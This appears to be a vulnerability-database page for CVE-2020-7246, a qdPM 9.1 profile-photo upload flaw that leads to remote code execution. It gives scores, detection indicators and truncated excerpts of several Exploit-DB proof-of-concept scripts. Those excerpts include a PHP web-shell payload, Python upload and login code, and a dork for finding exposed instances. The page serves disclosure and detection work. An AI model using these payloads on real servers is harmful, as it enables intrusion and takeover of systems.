CVE-2020-7246
published 2020-01-21CVE-2020-7246: A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo…
PriorityP277high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
83.23%
99.6th percentile
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qdpm | qdpm | <= 9.1 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect path traversal in the users[photo_preview] POST parameter — values containing '../' sequences targeting .htaccess deletion are a strong indicator of CVE-2020-7246 exploitation. ↗
- →Monitor POST requests to 'index.php/myAccount/update' that include a multipart file upload with a PHP file (Content-Type: application/octet-stream) as the users[photo] field. ↗
- →Detect PHP webshell execution attempts via GET requests to '/uploads/users/*.php?cmd=' — this path is where the malicious file lands after upload. ↗
- →Use the Google Dork pattern as a hunting query to identify exposed qdPM 9.1 instances: intitle:qdPM 9.1. Copyright © 2020 qdpm.net ↗
- →Uploaded PHP files in /uploads/users/ are renamed with a numeric prefix (e.g., 1584009-webshell.php). Alert on any .php file appearing under this directory. ↗
- ·Exploitation requires valid credentials for at least one non-admin user account. The designated admin account cannot be used because it lacks a myAccount page. ↗
- ·This CVE is an incomplete fix for CVE-2015-3884; installations that applied the prior patch may still be vulnerable if running qdPM 9.1 or earlier. ↗
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)
exploitdb·2022-05-25·CVSS 8.8
CVE-2020-7246 [HIGH] qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)
qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)
---
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>', 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.ge
Exploit-DB
qdPM 9.1 - Remote Code Execution (Authenticated)
exploitdb·2021-08-04·CVSS 8.8
CVE-2020-7246 [HIGH] qdPM 9.1 - Remote Code Execution (Authenticated)
qdPM 9.1 - Remote Code Execution (Authenticated)
---
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
, 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME +
'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.get(url)
#print(result.text)
login_tree = html.fromstrin
Exploit-DB
qdPM < 9.1 - Remote Code Execution
exploitdb·2020-02-28·CVSS 8.8
CVE-2020-7246 [HIGH] qdPM < 9.1 - Remote Code Execution
qdPM < 9.1 - Remote Code Execution
---
#!/usr/bin/python
#-------------------------------------------------------------------------------------
# Title: qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246)
# Author: Tobin Shields (@TobinShields)
#
# Description: This is an exploit to automatically upload a PHP web shell to
# the qdPM platform via the "upload a profile photo" feature.
# This method also bypasses the fix put into place from a previous CVE
#
# Usage: In order to leverage this exploit, you must know the credentials of
# at least one user. Then, you should modify the values highlighted below.
# You will also need a .php web shell payload to upload. This exploit
# was built and tested using the PHP script built by pentestmonkey:
# https://github.com/pentest
Exploit-DB
qdPM 9.1 - Remote Code Execution
exploitdb·2020-01-23·CVSS 8.8
CVE-2020-7246 [HIGH] qdPM 9.1 - Remote Code Execution
qdPM 9.1 - Remote Code Execution
---
# Exploit Title: qdPM 9.1 - Remote Code Execution
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2020-01-22
# Exploit Author: Rishal Dwivedi (Loginsoft)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
, 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME
+ 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
result = session_requests.get(HOSTNAME + '/index.php/login')
login_tree = html.fromstring(result.text)
authenticity_token = \
list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
)))[0]
payload = {'login[email]': EMAIL, 'l
Metasploit
qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)
metasploit·CVSS 8.8
CVE-2015-3884 [HIGH] qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)
qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/156063/qdPM-9.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156571/qdPM-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167264/qdPM-9.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168559/qdPM-9.1-Authenticated-Shell-Upload.htmlhttps://docs.google.com/document/d/13ZZSm0DL1Ie6r_fU5ZdDKGZ4defFqiFXMG--zDo8S10/edit?usp=sharinghttp://packetstormsecurity.com/files/156063/qdPM-9.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/156571/qdPM-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/167264/qdPM-9.1-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/168559/qdPM-9.1-Authenticated-Shell-Upload.htmlhttps://docs.google.com/document/d/13ZZSm0DL1Ie6r_fU5ZdDKGZ4defFqiFXMG--zDo8S10/edit?usp=sharing
2020-01-21
Published